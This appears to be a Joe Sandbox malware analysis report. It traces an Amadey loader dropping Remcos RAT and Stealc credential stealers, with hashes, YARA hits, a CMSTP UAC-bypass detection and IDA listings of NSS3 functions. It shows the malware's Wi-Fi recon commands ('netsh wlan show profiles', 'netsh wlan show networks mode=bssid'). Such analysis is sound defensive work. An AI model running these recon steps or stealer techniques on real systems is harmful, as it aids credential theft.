Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	22:12:33
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:	0xb20000
File size:	3'228'160 bytes
MD5 hash:	D1C392CD0570CDFD8CC42A3D5DFCB0FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000A.00000002.2089934901.0000000000B21000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 45%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	22:13:00
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Imagebase:	0xb20000
File size:	3'228'160 bytes
MD5 hash:	D1C392CD0570CDFD8CC42A3D5DFCB0FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.2923039342.0000000000B21000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	22:13:09
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004494001\remcos_a.exe"
Imagebase:	0x400000
File size:	1'948'672 bytes
MD5 hash:	B85C47881BA0EB0B556B83827F8E75C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2469760286.0000000000A0E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.2460202180.0000000000401000.00000040.00000001.01000000.00000010.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000003.2419805478.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	22:13:12
Start date:	06/11/2024
Path:	C:\ProgramData\Remcos\remcos.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Remcos\remcos.exe"
Imagebase:	0x400000
File size:	1'948'672 bytes
MD5 hash:	B85C47881BA0EB0B556B83827F8E75C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2926361931.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2922707020.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000003.2453130282.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2934103657.0000000004C2F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	22:13:14
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\1004506001\buildd.exe"
Imagebase:	0x1dba6960000
File size:	158'208 bytes
MD5 hash:	C426F46F2C074EDA8C903F9868BE046D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 55%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	22:13:15
Start date:	06/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Imagebase:	0x7ff6c1740000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	22:13:15
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:13:15
Start date:	06/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e5c60000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:13:15
Start date:	06/11/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profiles
Imagebase:	0x7ff686550000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:13:15
Start date:	06/11/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /R /C:"[ ]:[ ]"
Imagebase:	0x7ff616fb0000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:13:16
Start date:	06/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Imagebase:	0x7ff6c1740000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	22:13:16
Start date:	06/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	22:13:16
Start date:	06/11/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e5c60000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	22:13:16
Start date:	06/11/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show networks mode=bssid
Imagebase:	0x7ff686550000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:13:16
Start date:	06/11/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr "SSID BSSID Signal"
Imagebase:	0x7ff616fb0000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:13:20
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe"
Imagebase:	0xb60000
File size:	3'155'968 bytes
MD5 hash:	A17F03DADDF4FFD5B038F13CA94CCA7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.2855529774.0000000005CA1000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000003.2639955106.0000000000807000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000003.2794443992.00000000081E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.2848105530.00000000007A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 39%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:13:25
Start date:	06/11/2024
Path:	C:\ProgramData\Remcos\remcos.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Remcos\remcos.exe"
Imagebase:	0x400000
File size:	1'948'672 bytes
MD5 hash:	B85C47881BA0EB0B556B83827F8E75C8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2625408884.0000000000988000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000003.2584176441.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001B.00000002.2624639013.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:13:26
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe"
Imagebase:	0x3f0000
File size:	2'163'712 bytes
MD5 hash:	D21A2EB1558C04AF68AA39932C381A77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001C.00000002.2629001763.00000000003F1000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001C.00000002.2630997068.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001C.00000003.2576226521.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	22:13:30
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Wow64 process (32bit):
Commandline:	"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Imagebase:
File size:	3'228'160 bytes
MD5 hash:	D1C392CD0570CDFD8CC42A3D5DFCB0FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	22:13:34
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004516001\ed55d3f620.exe"
Imagebase:	0xb60000
File size:	3'155'968 bytes
MD5 hash:	A17F03DADDF4FFD5B038F13CA94CCA7D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2700117064.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000002.2902465184.0000000000F80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2700281753.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2684584505.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2683114049.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000002.2908134178.0000000005EF1000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001E.00000003.2858928335.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2716445296.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2734146790.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2714618817.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001E.00000003.2684189980.0000000000FE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	22:13:37
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe"
Imagebase:	0xf60000
File size:	2'765'824 bytes
MD5 hash:	941E61557EF13F76A606C961A64ED6AB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	22:13:42
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004517001\c2a8de8bf3.exe"
Imagebase:	0x3f0000
File size:	2'163'712 bytes
MD5 hash:	D21A2EB1558C04AF68AA39932C381A77
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000002.2791492042.00000000003F1000.00000040.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000003.2738544511.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000020.00000002.2792882659.000000000126B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	22:13:51
Start date:	06/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1004519001\315ef68721.exe"
Imagebase:	0xf60000
File size:	2'765'824 bytes
MD5 hash:	941E61557EF13F76A606C961A64ED6AB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	22:13:59
Start date:	06/11/2024
Path:	C:\ProgramData\Remcos\remcos.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Remcos\remcos.exe"
Imagebase:	0x400000
File size:	1'948'672 bytes
MD5 hash:	B85C47881BA0EB0B556B83827F8E75C8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000022.00000003.2918030164.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	false

Show Windows behavior

Function 6C666E90 Relevance: 142.5, APIs: 71, Strings: 10, Instructions: 783stringmemoryCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C7B2120,6C667E60), ref: 6C666EBC
TlsGetValue.KERNEL32 ref: 6C666EDF
EnterCriticalSection.KERNEL32(?), ref: 6C666EF3
PR_WaitCondVar.NSS3(000000FF), ref: 6C666F25

Part of subcall function 6C63A900: TlsGetValue.KERNEL32(00000000,?,6C7B14E4,?,6C5D4DD9), ref: 6C63A90F
Part of subcall function 6C63A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C63A94F

PR_Unlock.NSS3 ref: 6C666F68
PORT_ZAlloc_Util.NSS3(00000008), ref: 6C666FA9
TlsGetValue.KERNEL32 ref: 6C6670B4
EnterCriticalSection.KERNEL32(?), ref: 6C6670C8
PR_CallOnce.NSS3(6C7B24C0,6C6A7590), ref: 6C667104
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C667117
SECOID_Init.NSS3 ref: 6C667128
PORT_Alloc_Util.NSS3(00000057), ref: 6C66714E
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C66717F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6671A9
PR_NotifyAllCondVar.NSS3 ref: 6C6671CF
PR_Unlock.NSS3 ref: 6C6671DD
free.MOZGLUE(?), ref: 6C6671EE
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C667208
free.MOZGLUE(00000000), ref: 6C667221
free.MOZGLUE(00000001), ref: 6C667235
TlsGetValue.KERNEL32 ref: 6C66724A
EnterCriticalSection.KERNEL32(?), ref: 6C66725E
PR_NotifyCondVar.NSS3 ref: 6C667273
PR_Unlock.NSS3 ref: 6C667281
SECMOD_DestroyModule.NSS3(00000000), ref: 6C667291
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6672B1
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6672D4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6672E3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C667301
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C667310
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C667335
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C667344
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C667363
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C667372
PR_smprintf.NSS3(name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s",NSS Internal Module,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,6C7A0148,,defaultModDB,internalKeySlot), ref: 6C6674CC
free.MOZGLUE(00000000), ref: 6C667513
free.MOZGLUE(00000000), ref: 6C66751B
free.MOZGLUE(00000000), ref: 6C667528
free.MOZGLUE(00000000), ref: 6C66753C
free.MOZGLUE(00000000), ref: 6C667550
free.MOZGLUE(00000000), ref: 6C667561
free.MOZGLUE(00000000), ref: 6C667572
free.MOZGLUE(00000000), ref: 6C667583
free.MOZGLUE(00000000), ref: 6C667594
free.MOZGLUE(00000000), ref: 6C6675A2
SECMOD_LoadModule.NSS3(00000000,00000000,00000001), ref: 6C6675BD
free.MOZGLUE(00000000), ref: 6C6675C8
free.MOZGLUE(00000000), ref: 6C6675F1
PR_NewLock.NSS3 ref: 6C667636
SECMOD_DestroyModule.NSS3(00000000), ref: 6C667686
PR_NewLock.NSS3 ref: 6C6676A2

Part of subcall function 6C7198D0: calloc.MOZGLUE(00000001,00000084,6C640936,00000001,?,6C64102C), ref: 6C7198E5

PORT_ZAlloc_Util.NSS3(00000050), ref: 6C6676B6
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004), ref: 6C667707
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C66771C
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C667731
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,rdb:,00000004), ref: 6C66774A
DeleteCriticalSection.KERNEL32(?), ref: 6C667770
free.MOZGLUE(?), ref: 6C667779
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C66779A
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6677AC
PORT_Alloc_Util.NSS3(-0000000D), ref: 6C6677C4
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6677DB
strrchr.VCRUNTIME140(?,0000002F), ref: 6C667821
PORT_Alloc_Util.NSS3(?), ref: 6C667837
memcpy.VCRUNTIME140(00000000,00000000,00000000), ref: 6C66785B
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C66786F
SECMOD_AddNewModuleEx.NSS3 ref: 6C6678AC
free.MOZGLUE(00000000), ref: 6C6678BE
SECMOD_AddNewModuleEx.NSS3 ref: 6C6678F3
free.MOZGLUE(00000000), ref: 6C6678FC
free.MOZGLUE(00000000), ref: 6C66791C

Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407AD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407CD
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5D204A), ref: 6C6407D6
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5D204A), ref: 6C6407E4
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,6C5D204A), ref: 6C640864
Part of subcall function 6C6407A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C640880
Part of subcall function 6C6407A0: TlsSetValue.KERNEL32(00000000,?,?,6C5D204A), ref: 6C6408CB
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408D7
Part of subcall function 6C6407A0: TlsGetValue.KERNEL32(?,?,6C5D204A), ref: 6C6408FB

Strings

sql:, xrefs: 6C6676FE
kbi., xrefs: 6C667886
extern:, xrefs: 6C66772B
NSS Internal Module, xrefs: 6C6674A2, 6C6674C6
dll, xrefs: 6C66788E
,defaultModDB,internalKeySlot, xrefs: 6C66748D, 6C6674AA
dbm:, xrefs: 6C667716
name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s", xrefs: 6C6674C7
Spac, xrefs: 6C667389
rdb:, xrefs: 6C667744

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$strlen$Value$Alloc_ModuleUtil$CriticalSectionstrncmp$CondEnterUnlockcallocmemcpy$CallDestroyErrorLockNotifyOnce$DeleteInitLoadR_smprintfWaitstrrchr
String ID: ,defaultModDB,internalKeySlot$NSS Internal Module$Spac$dbm:$dll$extern:$kbi.$name="%s" parameters="configdir='%s' certPrefix='%s' keyPrefix='%s' secmod='%s' flags=%s updatedir='%s' updateCertPrefix='%s' updateKeyPrefix='%s' updateid='%s' updateTokenDescription='%s' %s" NSS="flags=internal,moduleDB,moduleDBOnly,critical%s"$rdb:$sql:
API String ID: 3465160547-3797173233
Opcode ID: c63ee32a882def3eab86ab0da8de2da8a27cfa7a79f26545318d721529acdd4a
Instruction ID: b8c2f13f2c6d120a2c0e645878d2398f77352178374a0f1a0a2ea9851bc792a4
Opcode Fuzzy Hash: c63ee32a882def3eab86ab0da8de2da8a27cfa7a79f26545318d721529acdd4a
Instruction Fuzzy Hash: 065206B1E01205ABEF108F66DC09BAE7BB4BF06348F144138ED19A7E41E771D954CB9A

Function 6C65EA80 Relevance: 107.5, APIs: 49, Strings: 12, Instructions: 735stringmemoryCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000), ref: 6C65EAB1

Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C7190AB
Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C7190C9
Part of subcall function 6C719090: EnterCriticalSection.KERNEL32 ref: 6C7190E5
Part of subcall function 6C719090: TlsGetValue.KERNEL32 ref: 6C719116
Part of subcall function 6C719090: LeaveCriticalSection.KERNEL32 ref: 6C71913F

